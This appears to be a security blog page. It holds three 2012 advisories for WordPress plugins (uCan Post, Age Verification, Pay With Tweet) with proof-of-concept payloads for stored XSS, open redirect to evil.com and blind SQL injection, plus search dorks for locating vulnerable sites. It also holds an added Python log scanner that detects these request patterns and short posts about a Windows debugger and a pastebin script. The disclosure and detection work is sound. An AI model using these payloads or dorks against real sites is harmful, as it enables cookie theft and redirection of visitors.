# Exploit Title: WordPress uCan Post plugin <= 1.0.09 Stored XSS
# Dork: inurl:/wp-content/plugins/ucan-post/
# Date: 2012/01/18
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip
# Version: 1.0.09

Vulnerability

You need permission to submit a post from the public interface. The submission form is not properly sanitized, which results in stored XSS in the admin pages:
-
The Name field is not sanitized; an injected payload is stored and rendered in the pending submissions page of the admin panel.
POC: myname’"><script>window.alert(document.cookie)</script>
-
The Email field is not sanitized, but it is checked for a valid email address, so the most that can result is a reflected XSS.
POC: my@mail.com’"><script>window.alert(document.cookie)</script>
-
The Post Title field is not sanitized; an injected payload is stored and rendered in the pending submissions page of the admin panel.
POC: title’"><script>window.alert(document.cookie)</script>
-
-
# Exploit Title: WordPress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4
-
Via GET:
http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
The rendered page will provide a link to http://www.evil.com
-
Via POST:
http://server/wp-content/plugins/age-verification/age-verification.php
redirect_to: http://www.evil.com
age_day: 1
age_month: 1
age_year: 1970
Direct redirect to http://www.evil.com
-
-
# Exploit Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
# Version: 1.1

1) Blind SQL Injection in shortcode:
The shortcode parameter ‘id’ is prone to blind SQL injection; you need to be able to write a post/page to exploit this:
[paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]

2) Multiple XSS in pay.php
http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php
After connecting to twitter:
?link=&22></input>[XSS]
After submitting the tweet:
?title=[XSS]&dl=[REDIRECT-TO-URL]')")[XSS]
The final download link will be replaced with [REDIRECT-TO-URL]
POC:
pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"<script>alert(document.cookie)</script>
-
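For site owners who cannot patch immediately, the request patterns in the Age Verification open-redirect advisory and the Pay With Tweet pay.php XSS advisory above are easy to spot in web-server access logs. The following scanner is an added example written for this page, not code from the advisories or the plugins; the host name, the plugin path `/wp-content/plugins/pay-with-tweet/pay.php` and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SITE_HOST = "blog.example.org"  # constructed: the WordPress host being protected

# Request part of a combined-log-format line: "METHOD /path?query HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markup fragments used by the pay.php PoCs above (closing tags, script, handlers)
XSS_RE = re.compile(r"<\s*/?\s*(script|input)|\bon\w+\s*=", re.IGNORECASE)

def is_offsite(redirect_to: str) -> bool:
    """True when redirect_to would leave SITE_HOST (the open-redirect case)."""
    target = unquote(redirect_to)          # catches double-encoded values too
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:       # absolute or protocol-relative URL
        return parts.netloc.lower() != SITE_HOST
    return target.startswith("/\\")        # browsers treat /\host like //host

def classify(line: str):
    """Return 'open-redirect', 'xss' or None for one access-log line."""
    m = REQ_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    params = parse_qs(parts.query, keep_blank_values=True)
    if path.endswith("/age-verification/age-verification.php"):
        if any(is_offsite(v) for v in params.get("redirect_to", [])):
            return "open-redirect"
    if "/pay-with-tweet" in path and path.endswith("/pay.php"):
        for key in ("link", "title", "dl"):
            if any(XSS_RE.search(unquote(v)) for v in params.get(key, [])):
                return "xss"
    return None

def scan(lines):
    """(line number, finding) pairs for every line that matches a PoC pattern."""
    return [(n, kind) for n, line in enumerate(lines, 1) if (kind := classify(line))]

# Constructed sample traffic, not real log data
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2012:12:00:00 +0000] "GET /wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com HTTP/1.1" 200 512',
    '203.0.113.8 - - [10/Jan/2012:12:00:01 +0000] "GET /wp-content/plugins/age-verification/age-verification.php?redirect_to=%2Fblog%2F HTTP/1.1" 302 0',
    '203.0.113.9 - - [10/Jan/2012:12:00:02 +0000] "GET /wp-content/plugins/pay-with-tweet/pay.php?link=%22%3E%3C%2Finput%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 1024',
    '203.0.113.9 - - [10/Jan/2012:12:00:03 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, kind in scan(SAMPLE_LOG):
        print(f"line {n}: {kind}")   # prints line 1: open-redirect, line 3: xss
```

Only GET requests are visible this way; the POST variant of the redirect and the uCan Post form submissions need request-body logging or a WAF rule with the same checks.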
Simple Debugger (sdbg) is a minimal Windows debugger I wrote to sharpen my knowledge of debugging practices.
It’s written in Python and is obviously built on top of the wonderful ctypes library. The overall architecture is heavily based on PyDbg, since I was already familiar with it.
At the time of this writing it’s capable of setting soft, hard and memory breakpoints, it has a minimal interactive shell to retrieve register status, and it’s expandable with custom callbacks for handling exceptions.
Building a debugger has been an awesome experience (except for the parts where I was swearing at the IA32 Intel docs) and I really learned a lot - and this was the main goal.
Since I am starting to wet my feet in reverse engineering I am looking to eat my own dogfood and use it for analysing some samples from my malware collection. This way I hope to keep it updated and maybe add some new features too.
As usual everything is GPLd and you can find it on my bitbucket page.
-
Since I haven’t managed to find a command line pastebin script that is based on the new APIs, I wrote one.
You can find it on my bitbucket.
Usage:
$ pastebin.py -f python -e 10M -p 1 -t MyPaste < whatever
Practically, you just pipe your data to the script.
Here are some options:
-f defines the data format (php, python, etc.)
-e the expiry time (10M, 1G, 1D, N)
-p the privacy (1 is private, 0 is public)
-t the title of the paste
The script looks for a config file in your home dir with your dev API key and optionally a username and a valid password (without valid login credentials your pastes will be anonymous).
The first time you run it, it will create the config (~/.pastebin). Feel free to fork/edit/whatever it.